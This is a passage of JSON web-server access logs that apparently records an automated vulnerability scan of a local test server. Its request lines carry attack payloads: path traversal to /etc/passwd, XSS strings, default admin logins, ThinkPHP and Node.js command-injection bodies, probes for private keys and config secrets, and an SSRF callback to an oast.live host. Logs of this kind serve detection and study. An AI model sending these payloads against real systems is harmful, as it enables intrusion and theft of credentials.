"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.307","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.378","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /altair HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.897","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.459","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /auth/?next=%2F HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"username=admin&passwd=admin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.506","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webadmin/pkg?command= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.878","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/database.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.265","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-push.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /portal/images/MyVue/MyVueHelp.png HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/cask/graphql-playground HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.299","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /install.php?profile=default HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.679","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /../conf/config.properties HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /v1/kv/28fHqSRuqEOL0lBf23RgqOhiSqO?raw HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.828","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /irj/go/km/navigation/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.872","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.501","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-daily.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.315","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.289","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/serverInfo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.677","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=c9oms3gsmpve1ijt0mc0qys9io8z34cfs.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.498","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/privatekey.pem HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.314","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /__ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.395","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/cam_portal.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.664","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.880","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.846","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"action=tie_ajax_search&query[]=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.447","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/graphql/v1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-issues.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.451","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('28fHqLiGMMJ2e1QLVHWD2ihwcGV')%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.374","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F28fHqNVFbqFitwvGN34cj1037TY.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"_charset_=utf-8&j_username=admin&j_password=admin&j_validate=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docker-compose.prod.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.393","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.392","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 